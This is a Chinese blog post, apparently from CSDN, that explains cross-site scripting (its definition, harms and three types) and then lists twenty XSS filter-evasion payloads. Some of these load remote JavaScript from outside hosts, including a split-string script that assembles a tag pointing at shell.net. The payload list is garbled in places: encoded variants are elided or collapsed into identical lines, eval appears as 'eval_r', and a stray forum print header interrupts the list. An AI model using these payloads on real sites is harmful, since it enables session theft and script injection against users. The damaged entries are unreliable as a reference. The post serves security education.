什么是XSS攻击?常见攻击方法汇总

最新推荐文章于 2024-09-30 21:52:51 发布
最新推荐文章于 2024-09-30 21:52:51 发布
阅读量1.3k 收藏 4
点赞数 1
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a38417/article/details/129549406
版权

一、什么是XSS?

XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。


这里我们主要注意四点:

1、目标网站目标用户;

2、浏览器;

3、不被预期;

4、脚本。

二、XSS有什么危害?

当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。


关于XSS有关危害,我这里中罗列一段列表,详细介绍不进行更多的赘述:

  •     挂马
  •     盗取用户Cookie。
  •     DOS(拒绝服务)客户端浏览器。
  •     钓鱼攻击,高级的钓鱼技巧。
  •     删除目标文章、恶意篡改数据、嫁祸。
  •     劫持用户Web行为,甚至进一步渗透内网。
  •     爆发Web2.0蠕虫。
  •     蠕虫式的DDoS攻击。
  •     蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据
  •     其它安全问题

三、XSS分类


XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS。

1、反射型XSS

发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。

2、存储型XSS

存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码

最典型的例子是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言的内容会从数据库查询出来并显示,浏览器发现有XSS代码,就当做正常的HTML与Js解析执行,于是触发了XSS攻击。

3、DOM XSS

DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情。

四、常见的XSS攻击方法

1、普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

2、IMG标签XSS使用JavaScript命令

<IMG SRC=http://3w.org/XSS/xss.js/>

3、IMG标签无分号无引号

<IMG SRC=javascript:alert('XSS')>

4、IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert('XSS')>

5、HTML编码(必须有分号)

<IMG SRC=javascript:alert("XSS")>

6、修正缺陷IMG标签

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

7、formCharCode标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

8、UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S')>

9、7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S')>

10、十六进制编码也是没有分号(计算器)

<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

11、嵌入式标签,将Javascript分开

<IMG SRC="jav ascript:alert('XSS');">

12、嵌入式编码标签,将Javascript分开

<IMG SRC="jav ascript:alert('XSS');">

13、嵌入式换行符

<IMG SRC="jav ascript:alert('XSS');">

14、嵌入式回车

<IMG SRC="jav ascript:alert('XSS');">

15、嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC="javascript:alert('XSS')">

16、解决限制字符(要求同页面)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

17、空字符12-7-1 T00LS - Powered by Discuz! Board

https://www.a.com/viewthread.php?action=printable&tid=15267 2/6
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

18、空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

19、Spaces和meta前的IMG标签

<IMG SRC=" javascript:alert('XSS');">

20、Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

德迅云安全--陈琦琦
关注
什么是 XSS 攻击
lio-zero 的博客
06-09 442
这几天整理的一下过往的文章和笔记,备份到了 Github 上,地址???? blog。 如果我的内容帮助到了您,欢迎点个 Star ???????????? 鼓励鼓励 :) ~~ ???? 我希望我的内容可以帮助你。现在我专注于前端领域,但我也将分享我在有限的时间内看到和感受到的东西。 XSS(Cross Site Scripting)是跨站脚本攻击。它是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶...
什么是xss攻击
小伟的博客
04-10 4538
跨站脚本攻击(XSS),英文全称 Cross Site Script   XSS攻击,一般是指黑客通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式   XSS攻击分为三种,反射型XSS、存储型XSS、DOM Based XSS. 了解什么是xss攻击,例子:   本地服务器demo目录下有个index.php,通过提交信息显示在页面上显示数据。   正常情况下:http:localhost/demo/index.php?name=张三,   网页上就会显
web安全测试之 xss攻击
weixin_30666753的博客
06-27 664
一、 背景知识 1、 什么是 XSS 攻击XSS 攻击: 跨站脚本攻击(Cross Site Scripting) , 为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。 故将跨站脚本攻击缩写为 XSS。 跨站脚本攻击, 是 Web 程序中常见的漏洞,XSS 属于被动式且用于客户端的攻击方式, 所以容易被忽略其危害性。 其原理是攻击者在网页中嵌入...
XSS攻击类型以及如何防范
最新发布
youxinm24的博客
09-30 1018
输入验证:对所有用户输入进行严格的验证和过滤,防止恶意代码注入。可以使用白名单方式,确保只允许符合预期格式的输入。输出编码对输出内容进行 HTML 实体编码,防止特殊字符被解释为 HTML 或 JavaScript 代码。使用库或框架(如 Vue.js、React 等)自带的安全机制进行安全的 DOM 操作。内容安全策略(CSP):通过设置 CSP 响应头,可以限制浏览器加载和执行的资源类型,从而减少 XSS攻击面。使用安全的 JavaScript 框架。
XSS详解(译)
yifeng_peng的博客
01-10 5767
一、XSS 概述 什么是XSS? Cross-site scripting(XSS)是一种能够在他人浏览器中执行恶意 JavaScript代码的代码注入攻击攻击者不需要直接接触受害者。他可以直接利用受害者访问的网站的漏洞来让恶意代码在其浏览器中执行。对于受害者的浏览器来说,恶意的 JavaScript 代码表现的就像是网站合法的一部分,而网站的行为也完全不像是攻击者的帮凶。 恶意的 JavaS...
XSS攻击
m0_49471668的博客
06-24 947
得分点 XSS是跨站脚本攻击、向目标网站插入恶意代码、大量用户访问网站时运行恶意脚本获取信息 标准回答XSS是跨站脚本攻击(Cross Site Scripting),不写为CSS是为了避免和层叠样式表(Cascading Style Sheets)的缩写混淆,所以将跨站脚本攻击写为XSS攻击者可以通过向Web页面里面插入script代码,当用户浏览这个页面时,就会运行被插入的script代码,达到攻击者的目的。 XSS的危害一般是泄露用户的登录信息cookie,攻击者可以通过cookie绕过登录步骤直接
XSS常见攻击与防御
weixin_37478507的博客
10-26 241
XSS常见攻击与防御 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。 XSS攻击案例...
XSS攻击常识及常见XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见XSS攻击脚本汇总
XSS攻击详解:类型、危害与防护策略
XSS攻击常识及常见XSS攻击脚本汇总 本文档深入探讨了跨站脚本(XSS攻击的基本概念、原理和常见危害。XSS是一种网络安全威胁,发生在目标网站用户访问含有恶意脚本的网页时,这些脚本在用户的浏览器上执行,从而...
xss跨站脚本攻击汇总
07-24
xss 跨站脚本攻击汇总 xss 跨站脚本攻击是一种常见的 web 应用程序漏洞,攻击者可以inject 恶意脚本到网页中,从而获取用户的敏感信息或控制用户的浏览器行为。下面是 xss 跨站脚本攻击的一些常见类型: 1. 普通的...
前端面试必备:浏览器安全与XSS攻击深度解析
"该资源是2021年的前端面试题汇总,重点聚焦于浏览器原理,其中详细讨论了XSS攻击的相关知识,包括攻击的概念、类型以及具体的攻击步骤。" 在前端开发中,理解浏览器原理及其相关的安全性问题至关重要。XSS(Cross-...
全面解析XSS跨站脚本攻击技术
"xss跨站脚本攻击汇总" XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本。这些脚本可以用来窃取用户数据、操纵网页行为或者传播恶意软件。以下是一些常见XSS攻击...
什么是XSS攻击呢?
Doubleu_的博客
07-20 395
什么是XSS攻击呢?XSS攻击就是跨站脚本攻击 -Cross Site Scripting, 其实应该简称CSS攻击,但是这样会造成误会,以为是css层叠式样式造成了网站安全,所以改称为XSS攻击。 一、跨站脚本攻击具体的攻击行为有哪些呢? 1.通过脚本启动安装网页上危险的程序,从而造成用户电脑的安全性丧失,这种方式曾经是病毒的主要扩散形式 2.通过脚本盗取用户cookie信息(docume...
XSS攻击及预防
weixin_48062613的博客
04-08 770
XSS 跨域脚本攻击,即在渲染DOM树的过程中发生了不在预期内执行的JS代码。访问劫持用户会话,插入恶意内容、重定向用户、使用恶意软件劫持用户浏览器、繁殖XSS蠕虫,甚至破坏网站、修改路由器配置信息等。 分类 持久性跨站:危害最大的一种,跨站代码存储在服务器(数据库)中 非持久性跨站:最常见的一种,网页中会存在嵌入好的恶意链接,用户点击后触发 DOM跨站:客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过
什么是XSS攻击
热门推荐
weixin_40851188的博客
04-18 1万+
网络千万条,安全第一条。网安不规范,网站都完蛋! 前端工程师接触最多的漏洞我想就是 XSS 漏洞了,然鹅并不是所有的同学对其都有一个清晰的认识。这篇文章将带领大家认清XSS攻击,以及对于XSS攻击该如何防范。 什么是XSS攻击XSS攻击指的是: 通过利用网页开发时留下的漏洞,恶意攻击者往Web页面里插入恶意 Script代码,当用户浏览时,嵌入其中Web里面的Script代码会被执...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值